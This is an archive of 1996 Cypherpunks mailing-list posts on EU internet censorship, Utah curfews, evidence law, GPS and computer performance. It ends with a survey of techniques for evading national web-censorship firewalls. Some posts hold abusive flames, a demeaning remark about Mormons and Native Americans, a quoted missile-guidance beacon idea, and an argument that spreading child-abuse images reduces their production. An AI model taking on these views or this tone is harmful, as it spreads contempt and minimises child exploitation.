> Oreja said among the options raised in the discussion paper were the > possibility of encrypting access so that only those who pay could see > the material, or including a special computer chip -- commonly known > as a V-chip -- to screen against pornographic content. The obvious solution to this is someone in an unregulated country getting a couple chips or programs for the de-encryption, then making the images/text/whatever freely available. The major hurdles for this are A. digital watermarking to see which chip(s) are used then block their ability to be used (a reason to get more than one chip/program so as to compare to filter out the watermarking - some techniques for watermarking will survive this, but most won't) and B. copyright laws in the countries which do not enforce such provisions. [...] > Oreja, aware that Internet servers can simply move to a neighbouring > country to get round any restrictions agreed at European level, said > problems with satellite television had shown that national and > European regulations were not enough. > "We know that national regulation is not enough, that European > regulation is not enough...We may need to have a world regulation of > these matters, but let's go step by step. We do not have a European > regulation," he said. If they seriously think this will happen, they need to take another look at the international situation. > The idea of a professional code of ethics in which the media would > regulate themselves is acknowledgment that European regulation of the > Internet could face opposition on freedom of information grounds. > "I think everything can not be said. I think that violence can have > its limits, I think that pornography can have its limits. I am in > favour of that, but it can be that the sector itself prepares a code > of ethics," he said. That's funny, if I were in favor of any censorship it would be of government propaganda such as this.... 
they seem to be calling for violence on a rather frequent basis. > He said such a code could help get round wide differences between EU > member countries, who have widely differing laws on what can be > considered pornography and eroticism. > Copyright © 1996 Nando.net From jimbell at pacifier.com Sun Sep 29 19:40:01 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 30 Sep 1996 10:40:01 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) Message-ID: <199609292339.QAA17774@mail.pacifier.com> At 12:16 PM 9/29/96 -0800, Timothy C. May wrote: >At 11:50 AM -0800 9/29/96, jim bell wrote: >>At 10:00 AM 9/29/96 -0800, Timothy C. May wrote: >>>(Hoist by their own petards indeed! Don't tell our Russian what petard >>>means.) >> >>Uh, wasn't that the name of the bald captain on Star Trek Next Generation? >>You know, "Jean-Luc Petard"? > >Picard. I forgot the smiley B^) >> The succeeding >>factor-of-1000 improvement appears (if the item above is accurate) to have >>taken 24 years to accomplish, so it's hard to imagine that the next factor >>of 1000 will arrive appreciably sooner than year 2020. > >I agree. (Actually, it was a factor of 4000 since it was only 64 processors, but who's counting?) Anyway, this reminds me: What was Moore's law? Performance doubling every 18 months as I recall? How does this stack up? Well, 24 years is 16 times 18 months, so the increase in performance should have been 2**16, or 64K. Off by a factor of 16, which is fairly close, as exponential expansions go. If I were inclined to make the numbers fit the theory, I would argue that the design for the Illiac IV was probably based on SSI IC technology that was defined in 1966 or so, which would provide the extra 6 years (four doubling periods) which account for the "error." One of the advantages of modern CAD technology is that chips can go from foundry to a working computer far faster. 
A few months ago, there was an item about how IBM had demonstrated its ability to produce 0.08 um silicon chips, with a gate delay (don't recall how loaded this was...) of about 24 picoseconds. Such a process could probably be used to produce a single chip that can do about 1 giga operations per second, assuming it was pipelined adequately. But even that's "only" a teraflop with 1000 such chips...It makes me wonder what kind of a rabbit they're gonna pull out of the hat to produce a petaflop. >By the way, I knew some of the folks who worked on parts of the >Illiac-IV, which was still limping along as late as the late 70s (maybe >later). I think it was turned off in about 1982 or 1983. I did a web-search on its history a few months ago. >>Yet a look at Intel's pricing for Pentiums shows that they sell a 120-MHz >>chip for about $135, while they sell a 200-megahertz version for around $550 >>or so. Arithmetic suggests that a person would be far better off with a >>4-120-MHz-processor Pentium (cumulative clock rate 480 MHz) than a single, >>200-megahertz version. (admittedly, peripheral logic costs will adjust this >>a little.) Of course, this would also leave Intel flat on its ass >>attempting to compete with AMD, Cyrix, etc, because a somewhat higher speed >>per cpu is just about the only advantage they have. > >Intel is having no problem at all competing with AMD and Cyrix! Both of >them are struggling---AMD just announced a layoff, and Cyrix is facing >financial troubles. Neither are able to make competitive parts, for reasons >I won't go into here, and neither are making the money they'll need to >compete in the future with Intel. (Intel has half a dozen billion-dollar >wafer fabs, running with extraordinarily high yields--so my sources tell me >:-})--and the more money they make, the more factories they build, the more >they learn about how to make 0.35 and 0.25 micron chips, etc.) 
True, but the world would be FAR better off if the architecture for the commonly-used PC could be extended to allow multiple processors. Yes, I'm aware of the inefficiency issues associated with multiple processors, but I think the dramatic cost reductions associated with the use of larger numbers of cheaper CPU's would much more than compensate for them. As I see it, there are inefficiencies associated with both making a single CPU do multiple tasks, as well as making multiple CPU's do a single task. The former is one of the reasons that PC's have pretty much mopped the floor with mainframes, because the PC's were not "unfairly" hobbled with having to implement complicated time-sharing software. The latter is the classic problem which kept people from going to massively parallel machines from scalars. However, I don't think that most of the problems a typical PC accomplishes are those "hard to divide" problems that resist parallel implementation. Rather, a multiprocessor PC would assign larger tasks (programs) to individual CPU's and not try to break up a program. Jim Bell jimbell at pacifier.com From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 29 19:43:45 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Mon, 30 Sep 1996 10:43:45 +0800 Subject: More on European Censorship Message-ID: <01IA2ASHUV7O8Y56RA@mbcl.rutgers.edu> > _________________________________________________________________ > webslingerZ > _________________________________________________________________ > EU TO ACT AGAINST INTERNET CHILD EXPLOITATION > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > BRUSSELS (Sep 29, 1996 00:12 a.m. EDT) - European Union > telecommunications ministers, reacting to a child-sex scandal in > Belgium, pledged Friday to consider ways to keep illegal material that > could harm children off the Internet. 
> Belgian Telecommunications Minister Elio Di Rupo announced that his > government planned to implement new measures requiring Internet access > providers to monitor and report material featuring sexual abuse or > exploitation of children. > He asked his colleagues to join forces with him. > "Today a big legal vacuum exists, for legislation is falling behind > technological evolution," he said, according to a speaking note that > was distributed to reporters. > "There is a big risk that it will create an enormous market of > children fed on by criminals." Market? Wider distribution of such pictures will lead to _decreased_ production, for the simple reason that the producers won't be able to go to courts for stopping copyright violations, so they can't make any money. > The ministers agreed to expand a working party that has already been > set up to look at the question of illegal material on the Internet and > asked it to come up with concrete proposals before they meet again in > November. > The group will include representatives of the 15 EU telecoms > ministries and of companies that provide access to online services or > prepare the content, a statement adopted by the ministers said. [...] > But some of the telecoms ministers, including those from Britain and > Sweden, warned that the EU could not wander into censorship and had to > focus on fighting truly illegal material. > British Science and Technology Minister Ian Taylor advocated a > self-regulatory system that was announced in his country earlier this > week. > Two British trade associations announced that an independent body, the > Safety Net Foundation, would be established to rate material carried > on the Internet and to set up a "hotline" service to receive > complaints about illegal material. > They said Internet service providers would also adopt policies for > removing illegal material and reducing the scope for subscribers to > act with untraceable anonymity. 
I suspect that any anonymous remailers operating in Britain may want to look out for ISP interruptions... > Swedish Communications Minister Ines Uusmann told reporters that EU > countries needed to exchange ideas and to speak with one voice in > tackling a global problem. [...] > Copyright © 1996 Nando.net From Ryan.Russell at sybase.com Sun Sep 29 19:58:08 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Mon, 30 Sep 1996 10:58:08 +0800 Subject: Utah as a Religious Police State Message-ID: <9609300033.AA05981@notesgw2.sybase.com> Hmm...never heard that one before. Care to produce a reference? (Or am I supposed to be ignoring this guy when he makes ridiculous claims?) Ryan ---------- Previous Message ---------- To: cypherpunks cc: From: dlv @ bwalk.dm.com (Dr.Dimitri Vulis KOTM) @ smtp Date: 09/29/96 05:54:09 PM Subject: Re: Utah as a Religious Police State Ryan Russell/SYBASE writes: > I guess that depends on your definition of liberty. The Mormons > originally moved there to have a place to practice their religion, > and have freedom from persecution. I suppose one could extend that > to wanting a place to have the freedom to have a set of rules consistent > with their beliefs. Should that include freedom from interference from > folks such as yourself who want to change their rules, even though > you're not presently affected? It's worth noting that one of Utah mormons favorite pastimes was to ambush the settlers heading for California, kill them all, and take their property. However the mormons were dealt with much less severely than the local Indians who tried the same tricks. Pity. 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From Ryan.Russell at sybase.com Sun Sep 29 20:02:23 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Mon, 30 Sep 1996 11:02:23 +0800 Subject: Utah as a Religious Police State Message-ID: <9609300031.AA05971@notesgw2.sybase.com> Yes, my mail gateway sometimes does rude things to the mail headers...Just ignore it :) Anyway, you may have a clear cut line between who gets to control kids, but I think it may not be so clear as you make it out to be. Why should you be able to say what times your kids have to come in? Why should you be able to limit their civil liberties? Because you are the parent? Why should that be any better reason than because they're the government? Is it your God-given right as a parent? (Don't answer that, I don't even want to start on religion with this crowd..) Conversely, if you think a parent has the right, why shouldn't a group of parents (who agree) be able to set some rules? Why not a town? These were originally nearly all-Mormon areas...Why shouldn't they be allowed their rules just because a non-Mormon chooses to move in? One might argue "if you don't like the rules, don't live there." I suppose you aren't familiar with the rules for participating in church activities, or attending BYU. The rules are generally very simple, live by the Mormon standards, or don't participate. So, that means that students at BYU can't smoke, drink, etc... So is the line between "public" and "private"? i.e. if BYU were an even partially publically funded school, they shouldn't be allowed to have any but the lowest-common-denominator rules? That sounds overly arbitrary to me, and doesn't appeal to the spark on libertarian I have :) Seriously, since laws are all based on a publically held set of morals, why shouldn't some places be able to have a higher set of standards than others. I think that's part of the argument for state's rights. 
After all, we allow a lower than normal set of standards (Nevada.) Ryan ---------- Previous Message ---------- To: cypherpunks cc: cypherpunks From: tcmay @ got.net ("Timothy C. May") @ smtp Date: 09/29/96 01:17:46 PM Subject: Re: Utah as a Religious Police State (I received this message, with "cypherpunks at sybase.com" as well as "tcmay at sybase.com" (???) cc:ed, so I assume this message was intended for the Cypherpunks list, with some sybase domain name weirdness, or reflector, going on.) At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote: >I guess that depends on your definition of liberty. The Mormons >originally moved there to have a place to practice their religion, >and have freedom from persecution. I suppose one could extend that >to wanting a place to have the freedom to have a set of rules consistent >with their beliefs. Should that include freedom from interference from >folks such as yourself who want to change their rules, even though >you're not presently affected? Well, if Utah can rig a way to _secede_ from the Union, your arguments would make more sense. But so long as they are part of these United States, their religious beliefs about when children should be at home cannot supersede basic liberties. (There are some thorny issues about whether _minors_ have full civil rights. But I certainly know that _my_ civil rights are being affected when my children are not allowed on the streets after some hour. If my child is out, this is my problem. I neither want cops to stop-and-detain my children, nor do I want my tax monies to be used to control the behavior of other people's children. Providing no crimes are being committed, curfews for the sake of controlling the behavior of children are no more just than would be a bunch of related behavior control laws, e.g., a ban on comic books, a mandate that all children join after-school youth leagues, etc.) As for "changing their rules," you're missing the point. 
There are presumably many in Utah who believe as I do (maybe even some Mormons). Those who are living in Utah, as renters, owners, whatever, should not be bound by unconstitutional rules, no matter how many Mormon Elders favor them. Unless the Mormons own _all_ of the property (and maybe not even then, as renters have civil rights), they cannot impose their own notions of morality on the rest of the population, except in compelling cases (e.g., involving the well-known actual _crimes_). I don't mean to pick on Mormons, as other communities have also attempted to impose curfews and other restrictions on the children of others. My ire was raised by Attila's enthusiastic support for laws which no freedom-loving person should be enthusiastic about. Again, I have no problem with Attila restricting his own children's movements, or joining with other parents to control the behavior of their _own_ children, via religious camps, religious schools, youth leagues, etc. He can even make his own kids wear funny uniforms, funny religious hats, whatever. But, for example, telling _me_ when _my_ children may be out on public streets (doing nothing illegal, neither robbing nor spray-painting nor committing any other real crimes) is unacceptable. I urge Attila (and others) to rethink enthusiastic support for curfews. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From gdcochra at utep.edu Sun Sep 29 20:21:57 1996 From: gdcochra at utep.edu (Gerard D. Cochrane Jr.) 
Date: Mon, 30 Sep 1996 11:21:57 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: Sorry about this message that went out. Looks like I got a few idiots sending messages from a hacked account. Sorry for the waste of bandwidth. Thanks. Jerry On Sun, 29 Sep 1996, Gerard D. Cochrane Jr. wrote: > On Sun, 29 Sep 1996, Brian Davis wrote: > > > On Fri, 27 Sep 1996, Timothy C. May wrote: > > > > > At 5:43 PM -0400 9/27/96, Black Unicorn wrote: > > > >On Thu, 26 Sep 1996, Timothy C. May wrote: > > > > > > >His admission that he used the notebook. Recovering the notebook and > > > >finding the software. Interviewing the Customs agent working at the time. > > > > > > His admission that he used _which_ notebook? Chain of evidence again. > > > > > > Finding _which_ software? > > > > > > (As for the Customs agent, I can assure you that my luggage has never been > > > checked upon either leaving the U.S. or entering the U.S. Even if U.S. > > > Customs could figure out who was working at the time I putatively entered > > > the country, and even if he remembered _me_, months later, just what > > > records would he have, and how would they stand up in court?) > > > > > > Hearing me say I "exported crypto," a hearsay claim, and happening to find > > ^^^^^^^^^^^^^^^ > > It is an admission against interest and a confession; it is admissible > > against the speaker in a prosecution against him for "exporting crypto" > > from a strictly evidentiary standpoint. > > > > > one or more laptops at my home, weeks or months later, implies nothing. (To > > > make the point graphically, suppose the raiding party finds _several_ > > > laptops or notebooks...do they assume _all_ were taken out of the country, > > > or do they pick the one with the most incriminating software on it? Answer: > > > Unless they can _prove_ one of them was used, and that it had not been > > > _changed_ since the putative event (highly unlikely), they cannot simply > > > _assume_ one of them was taken out. 
> > > > Your understanding of evidence is inaccurate. The evidence re the > > laptop[s] would be admissible and the parties would argue about what it > > meant. The jury is entitled to draw common sense inferences. That might > > be easy to do in a case in which a defendant has confessed.... > > > > > > > > > (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not > > > the one I took to Europe." "Oh, you say this laptop has PGP 5.9 on it? > > > So? I installed it last week. My trip to Europe was last summer.") > > > > So now you, as your own lawyer (apparently) have decided to take the > > stand and testify. Remember that the prosecutor gets to cross-examine > > you. Things are about to get ugly.... > > > > > > > > > > >Considering the headaches required for airline travel today, it's not like > > > >there aren't serious records abound. > > > > > > Such as? I recall no inspections of my luggage, no inventorying of the > > > serial numbers of my laptops, no inspection whatsoever of my > > > magneto-optical drives (which were in my carry-on luggage, and not even > > > glanced at, in the box they were in). X-rays would not prove what was taken > > > in or out of the country, even if "x-ray escrow" were implemented (which it > > > is not, according to all reports I have heard, and based on some practical > > > limits on storage), I doubt the records of a trip, say, last summer (of > > > '95) could be retrieved and prove that a particular laptop was taken out. > > > Not to mention that the software allegedly taken out might have been on any > > > kind of media, none of them distinguishable with an x-ray machine. > > > > Circumstantial evidence is admissible if probative of a fact at issue in > > the case. Evidence that you took a laptop out of the country is > > probative of the allegation that you exported crypto using a laptop. > > > > > > > > > >For crying outloud, he admitted to the world that he took the software > > > >out. 
I put that in front of a jury and it looks just like the typical > > > > > > "For crying out loud" is bluster, not legal argument. > > > > And your understanding of evidence shows a misunderstanding of how the > > rules of evidence actually work in a courtroom. > > > > > > > >stupid bragging criminal. Any defense about "I was just kidding" or "The > > > >message was forged" might be interesting, but it will sound like > > > >technical-mumbo-jumbo to a jury. Yes, it would convince >ME< that was a > > > > > > Legal proof is still needed. Given only a nebulous statement like "I > > > exported crypto in violation of the ITARs," or "I shipped PGP to Europe," > > > is not enough for a case even to be brought to trial. > > > > You are absolutely wrong. It may not be enough for a conviction, but it > > will beat a Rule 29 motion (Motion for a judgment of acquittal) and get > > the case to the jury. > > > > > (If it reached trial, I would expect a defense attorney to move for > > > dismissal. Absent any evidence that a crime occurred, absent any proof > > > beyond the nebulous hearsay statement of a "braggart," there is simply no > > > basis for criminal action.) > > > > > > "Stupid bragging criminals" may be common, but bragging is not in and of > > > itself illegal. There still has to be evidence of a crime. > > > > Must a jury believe that you were "just bragging" because you now, in a > > criminal trial, say that you were? > > > > > > > "Produce the body." > > > > Perry Mason is only active in re-runs. > > > > > > > > (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the > > > body, or witnesses, does this mean I'll be found guilty? To use BU's > > > phrasing, "for crying out loud.") > > > > That's where prosecutorial discretion comes in and a judge's and jury's > > common sense comes in if the prosecutor runs amok. > > > > BTW, I am far more willing to believe you were bragging about whacking > > Jimmy Hoffa than about exporting crypto. 
Think of all the interesting > > evidence from this mailing list's archives that prosecutors would attempt > > to introduce against you ... > > > > Not to say that *I* couldn't get you off, but not the way you propose. > > > > EBD > > > > > > > > > --Tim May > > > > > > We got computers, we're tapping phone lines, I know that that ain't allowed. > > > ---------:---------:---------:---------:---------:---------:---------:---- > > > Timothy C. May | Crypto Anarchy: encryption, digital money, > > > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > > > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > > > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > > > "National borders aren't even speed bumps on the information superhighway." > > > > > > > > > > > > > > > > > > > > YEAH FUCK YOU.. YOUR ALL FUCKING STUPID ... DONT FUCKIN WRITE THIS SHIT.. > YER ALL DUMB STUPID LITTLE 5 YEAR OLDS WHO KNOW JACK SHIT.. GET OFF THE > FUCKIN SUBJECT YOU LAME ASS WHOREs.. FUCKIN YOU WANT A REAL FELONY.. TRY > TO HACK MY SYSTEM... THIS SYTEM CANNOT BE HACKED IF YOU GET ROOT I GIVE > YOU PERMISSION TO NUKE MY SYS.. FUCK YOU BASTARDS... STUPID NUTSAKCS. > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ It's better to be thought a fool, then to open your mouth and prove it. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A mind is like a parachute, it only works when it is open. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ----------------------------------------------------------------- Gerard D. Cochrane Jr. 
Software System Specialist II Systems Programmer University of Texas at El Paso Phone: (915) 747-5256 Fax: (915) 747-5067 E-mail: gdcochra at mail.utep.edu -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBtAzFsQbcAAAEDAKaA49HDrO1mQQiC1YZ1WqXxggOmd98l2ArWyWLi64XUzyQp JgVdv0svCAoFLj0UDQ5iqsWkznZXD4di8exS0Bq+1C/dXacEPwiQMR28gF3+ATxD kw0UAW22cbNE7KxgRQAFEbQIZ2Rjb2NocmE= =3OP7 -----END PGP PUBLIC KEY BLOCK-----

From dustman at athensnet.com Sun Sep 29 20:24:26 1996 From: dustman at athensnet.com (Dustbin Freedom Remailer) Date: Mon, 30 Sep 1996 11:24:26 +0800 Subject: Key-Escrow In-Reply-To: <960929141327_113858214@emout06.mail.aol.com> Message-ID: <199609300025.UAA09373@godzilla.athensnet.com>

: Couldn't one burn off maybe 10 ** 200 keys and say, hey gubermint dude, these : are like, gonna be my keys.

At 15 bucks a pop, even Bill Gates couldn't afford to register that many keys.

From ponder at freenet.tlh.fl.us Sun Sep 29 20:35:12 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Mon, 30 Sep 1996 11:35:12 +0800 Subject: GPS [MARGINAL, at best] Message-ID:

There was an article in _Scientific American_ February 1996 about GPS. I couldn't find the magazine, but they had this squib on the www.sciam.com website:

"The Global Positioning System" Thomas A. Herring

Two dozen satellites hovering thousands of miles up can locate your position on the earth's surface to within a few centimeters. Originally constructed for military applications, this network of space beacons today finds civilian applications--such as landing airplanes in fog--that demand accuracy beyond what its designers had thought would be technically possible.

According to the website, there was also a letter in the June 1996 issue responding to Herring's article. Here it is:

MILITARY ADVANTAGE

I was pleased when I first saw your February article "The Global Positioning System," by Thomas A. Herring.
As developers and operators of GPS, we in the Department of Defense and our partners in industry are justifiably proud of the technology. GPS represents the best of American scientific and technical ingenuity as well as being an excellent example of cooperation between the military and civilian sectors. But after reading the entire article, I was disappointed by its unbalanced discussion of the national security aspects of GPS.

Yes, the Defense Department does operate GPS with unpopular security features. But these features were not designed to inconvenience the peaceful users of the system, as Herring implies. Rather they were designed to provide U.S. and allied forces with a crucial military edge. Furthermore, the Defense Department is well aware that the security aspects of GPS are an additional burden for many users. And while we believe such measures are still needed at this time to help preserve our military advantage, we have set a goal of discontinuing regular use of the feature known as Selective Availability, the component that degrades GPS accuracy, within a decade. Both time and resources are needed to replace the advantages Selective Availability provides.

In light of the revolutionary contributions of GPS to both military and commercial enterprise, Herring could have portrayed the technology in a more evenhanded manner.

PAUL G. KAMINSKI Under Secretary Department of Defense

-- end of quoted material --

The article, as I recall, was about ways in which civilian users have found, or are finding, ways around the built-in inaccuracy of the GPS. I don't recall whether crypto was mentioned in the article. My recollection of it was that they had been diddling with the timers or the clock signal or something, as opposed to encrypting anything. But then again it has been a while, and my memory of it isn't too clear.

I seem to remember another crypto scheme discussed here at length about GPS, based on a paper by Dr. Dorothy [?]
Denning, which involved having the intended recipient's coordinates - which were somehow involved in the encryption. The coordinates are in 3-D. Spheres centered on three of the GPS satellites intersect within a very small space. -- public service announcement: ------------------------------------------------------------- To remove yourself from the cypherpunks mailing list send to: majordomo at toad.com a message that contains the text: unsubscribe cypherpunks in the body of the message, not the subject line. -------------------------------------------------------------- From dlv at bwalk.dm.com Sun Sep 29 21:44:36 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 30 Sep 1996 12:44:36 +0800 Subject: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May In-Reply-To: <199609300138.AA08482@crl12.crl.com> Message-ID: berserk Timmy May has gone . Has he been eating speed? bananas >From: Troy Varange >Message-Id: <199609300138.AA08482 at crl12.crl.com> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT) >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm >X-Mailer: ELM [version 2.4 PL23] >Mime-Version: 1.0 >Content-Type: text/plain; charset=US-ASCII >Content-Transfer-Encoding: 7bit >Content-Length: 3442 > >> >> What has Timmy been smoking? 
>> >> ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996 >> ]Received: by bwalk.dm.com (1.65/waf) >> ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT >> ] for dlv >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; >> ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400 >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129; >> ] 29 Sep 96 15:59 BST >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net >> ] id aa09441; 29 Sep 96 15:54 BST >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP >> ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000 >> ]Comments: Authenticated sender is >> ]From: paul at fatmans.demon.co.uk >> ]To: "Dr.Dimitri Vulis KOTM" >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000 >> ]Mime-Version: 1.0 >> ]Content-Type: text/plain; charset=US-ASCII >> ]Content-Transfer-Encoding: 7BIT >> ]Subject: Re: Possible subs attack???? >> ]Priority: normal >> ]X-Pm-Encryptor: JN-PGP-P, 4 >> ]X-Mailer: Pegasus Mail for Windows (v2.31) >> ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk> >> ] >> ]-----BEGIN PGP SIGNED MESSAGE----- >> ] >> ] >> ]> The lying sack of shit Timmy May writes: >> ] >> ]> The lying sack of shit Timmy May lies again, as usual. >> ] >> ]Fuck you, >> ] >> ]I am not Tim May, Check out the return path if you don`t believe me, >> ]if you still don`t here`s my PGP public key signed by the EFF, they >> ]don`t sign keys here and there without checking ID`s... 
>> ] >> ]Type Bits/KeyID Date User ID >> ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley >> ] >> ] >> ] >> ] Datacomms Technologies web authoring and data security >> ] Paul Bradley, Paul at fatmans.demon.co.uk >> ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org >> ] Http://www.cryptography.home.ml.org/ >> ] Email for PGP public key, ID: 5BBFAEB1 >> ] "Don`t forget to mount a scratch monkey" >> >Fuckhead.
From shamrock at netcom.com Sun Sep 29 22:09:07 1996 From: shamrock at netcom.com (Lucky Green) Date: Mon, 30 Sep 1996 13:09:07 +0800 Subject: GPS and other Dual-use technologies In-Reply-To: Message-ID: On Sun, 29 Sep 1996, Steve Schear wrote: > Craft are free to use any navigational technology, but must be autonomous > from launch to delivery. To aid navigation I was considering the design of > a substitute differential GPS beacon functionally interchangable with those > offered by the USCG. My device would work on a different frequency, > possibly using very wideband direct sequence spread spectrum (for low > probability of intercept/detection) and be actuated by the missile as it > neared the target in order to refine its position. While in St. Louis on business, I talked with two guys writing the operations manual for a new Navy missile built by a local defense contractor. The missile was using GPS for targeting. --Lucky From geeman at best.com Sun Sep 29 22:15:05 1996 From: geeman at best.com (geeman at best.com) Date: Mon, 30 Sep 1996 13:15:05 +0800 Subject: Does any body know anything about this? Message-ID: <01BBAE45.DD7DB480@geeman.vip.best.com> Snakeoil? Matt Blaze? Where _you_ been, cowboy? ---------- From: John Anonymous MacDonald[SMTP:nobody at cypherpunks.ca] Sent: Sunday, September 29, 1996 2:38 PM To: cypherpunks at toad.com Subject: Does any body know anything about this? Is this just more snakeoil or is this real? 
<<<<<<<< FORWARDED MESSAGE >>>>>>>> From: Ross Anderson Date: Fri, 20 Sep 1996 09:05:28 +0100 Subject: Seminar in Cryptology and Computer Security *** *** *** *** *** University of Cambridge Computer Laboratory EXTRA SEMINAR SPEAKER: Matt Blaze AT&T Research DATE: Monday 23rd September 1996 at 11.30 am PLACE: Room TP4, Computer Laboratory TITLE: SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS A useful principle in cipher design is to reduce or at least relate closely the cryptanalysis of the cipher to some long-studied problem that is believed to be difficult. Most public-key ciphers follow this principle fairly closely (e.g., RSA is at least similar to factoring). Modern symmetric-key ciphers, on the other hand, can rarely be reduced in this way and so are frequently designed specifically to resist the various known cryptanalytic attacks. In this informal talk, we examine a simple cipher primitive, based on Feistel networks, for which recovery of its internal state given its inputs and outputs is NP-complete. We outline simple and efficient block- and stream- cipher constructions based on this primitive. * * * The regular Michaelmas term seminar series will resume on the 8th October with a series of talks on Tuesday afternoons at 4.15 PM in room TP4, Computer Laboratory, Pembroke Street, Cambridge. A list of speakers will be circulated shortly. * * * From stewarts at ix.netcom.com Sun Sep 29 22:30:12 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 30 Sep 1996 13:30:12 +0800 Subject: Tools for Rendering Censorship Firewalls Ineffective Message-ID: <199609300259.TAA04617@dfw-ix8.ix.netcom.com> I've been trying to categorize the web censorship techniques available to governments, such as Singapore and China's Firewall Curtains, Germany's ISP Threats, etc. 
The objective is to make information widely and conveniently available to subjects of the censoring country by building tools that will provide multiple paths to data that are easy to find and hard to block because they're too pervasive.

I'm assuming that email is difficult to block, in-country public websites are blockable (through business licenses, lawsuits, rubber-hoses, or confiscation), in-country private websites are difficult to block but not very relevant, authors can afford and post to foreign web sites without effective blocking, and that the real "threat" to the government is foreign websites making banned information conveniently available to its subjects. I'm also assuming that the government can use humans to discover a moderate quantity of banned info, but that blocking will mostly be done by bots rather than human readers.

In particular, I'm ignoring the approach of in-country hidden websites, since it's too vulnerable in some countries, and focussing on the web rather than email because it's mass-market and easier to use, and email is harder to stop, especially given crypto and remailers.

Notation: "Attack" is the Censors trying to stop data; "defend" and "evade" are the Good Guys trying to not get censored.

The obvious techniques I can see include
1) Filter on IP address (e.g. German attack on XS4ALL)
2) Filter on DNS Name
3) Filter on Patterns in URL
4) Filter on Patterns in PUT/GET Requests
5) Filter on Patterns in Response.
6) Traffic Analysis on reading patterns

Defenses - The most important defenses to these attacks depend on ubiquity and volume - they can block one or two of anything, they might be able to block a thousand, and it's not possible to block millions of things everywhere. So building bridges between systems and increasing multiplicity is a win.

1) It's easy to evade the crude version of this attack - use rolling IP addresses, and use DNS to publish the new ones. For the German model, where the government has to tell the ISPs who to block, this wins. They can counter by blocking your whole IP network, not just a single machine, which you can counter by hopping IP networks as well as hosts, though that's more trouble (and blocking routes is probably easier than blocking hosts, since you do it at the routers, and harder to get people to turn back on.) They can also enforce boycotts on the ISP, as they did with XS4ALL - blocking most of the traffic to a site can affect its other traffic enough to be economically annoying.

The attackers can counter by also tracking the address with a bot - if you change addresses hourly, they can change blocking addresses hourly, which may be workable for somewhere high-tech like Singapore or very focussed like China, but isn't very effective for somewhere porous like Germany that has a system of laws that move at the speed of bureaucracy.

A very effective defense against this method is to deploy relay servers, either anonymizers or simple non-anonymizing cgi scripts that take URLs like http://foo.bar.com/cgi-bin/relay.pl/http://banned.site.org/ and fetch and return the real URL (perhaps modifying any URLs in it to connect through the relay.) This works if there are lots of easy-to-find relay servers. An obvious approach would be to package the relay program with Apache or other popular web server, so anybody who didn't bother turning it off would have a relay named "relay.pl"; the attackers can't realistically block everybody who's got one.

Another effective defense is to use web servers that gateway to AFS (Andrew File System) or other distributed file systems. This lets /stanford.edu/censored-mirrors/banned.html be accessible from any site supporting AFS, such as http://www.cmu.edu/afs/stanford.edu/censored-mirrors/banned.html This has the great advantage that AFS sites are usually at major universities, which are important enough that lots of people would complain if you blocked them. This works better if there's an easy way to insert things into the AFS tree - volunteers are fine, but if there are servers that can automatically import material it becomes easier, either by copying or by various kinds of indirection. (On the other hand, if you allow automated import, attackers can turn your site into the Child Pornography NarcoTerrorist Bomb Info Mart and ban you...) Do the major web crawlers index AFS? Or do the sites use robots.txt to prevent multiple crawls, e.g. by only allowing searching on the local file systems and not on the remote ones?

